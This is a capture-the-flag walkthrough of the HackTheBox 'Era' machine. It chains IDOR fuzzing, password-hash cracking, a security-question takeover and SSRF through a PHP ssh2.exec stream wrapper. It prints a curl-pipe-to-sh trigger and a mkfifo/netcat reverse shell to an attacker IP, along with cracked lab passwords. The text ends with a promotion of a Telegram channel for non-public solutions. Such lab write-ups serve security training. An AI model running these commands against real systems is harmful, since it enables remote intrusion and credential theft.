ERA HTB Writeup | HacktheBox | Season 8
Platform: HackTheBox Difficulty: Intermediate Focus: Enumeration, IDOR, SSRF, FTP Exploitation, Privilege Escalation
π Overview
The Era machine is a great example of a vulnerable system with multiple chained exploits. We start from basic enumeration and reach full root access by exploiting a combination of misconfigurations and overlooked features.
π Step 1: Enumeration
We begin with an nmap scan to map open ports and services.
nmap -A -p- 10.10.11.79 -T4
Findings:
Port 21: vsftpd 3.0.5(FTP)
Port 80: nginx 1.18.0 (HTTP, redirected to http://era.htb)
π Step 2: Subdomain Enumeration
Using ffuf for virtual host fuzzing:
ffuf -w /usr/share/amass/wordlists/bitquark_subdomains_top100K.txt \ -H "Host: FUZZ.era.htb" -u http://era.htb -mc 200
Finding:
file.era.htb is discovered and accessible.
π€ Step 3: Register User and File Download IDOR
Register on file.era.htb, then fuzz for valid file IDs using:
seq 0 1000 > id.txt ffuf -u http://file.era.htb/download.php?id=FUZZ -w id.txt \ -H "Cookie: PHPSESSID=..." -mc 200
Finding:
Valid file ID: 54
File downloaded: site-backup-30-08-24.zip
𧩠Step 4: Analyzing the SQLite Database
Unzip and extract the database.
sqlite3 filedb.sqlite
SELECT user_name, user_password FROM users;
We dump multiple password hashes.
π Step 5: Cracking Password Hashes
Use hashcat with RockYou:
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt --show
Cracked:
eric : america
yuri : mustang
π Step 6: Updating Admin Security Questions via Authenticated User
While browsing file.era.htb, we discover an account management feature:
π§ Key Insight: The user admin_ef01cab31aa exists, and regular users (like Yuri) can update security questions for any user.
Exploit:
- Login as yuri : mustang
- Go to Update Security Questions feature
- Target username: admin_ef01cab31aa
- Change their questions/answers
Now we can reset the admin's password or use the security answers to login as admin.
π£ Step 7: Exploiting IDOR + SSRF via Stream Wrappers
Now authenticated as admin_ef01cab31aa, we abuse the vulnerable format= parameter in download.php.
This accepts PHP stream wrappers, allowing SSRF and command execution.
Payload Script (zy.sh):
mkfifo /tmp/s; /bin/sh </tmp/s | nc 10.10.xx.xx 4444 >/tmp/s; rm /tmp/s
Host the file:
bash CopyEdit python3 -m http.server 80
Trigger the payload:
http://file.era.htb/download.php?id=8554&show=true&format=ssh2.exec://eric:[email protected]/curl+-s+http://10.10.xx.xx/zy.sh|sh
Start your listener:
nc -lvnp 4444
π Shell popped!
πͺ Step 9: Privilege Escalation via Group-Writable Binary
We are now the eric user.
Discovery:ls -l /opt/AV/periodic-checks/monitor
- Owned by root
- Group devs has write access
- Eric is in group devs β
Access is restricted by HackTheBox rules#
The solution to the problem can be published in the public domain after her retirement.
Look for a non-public solution to the problem inΒ the telegram channelΒ .
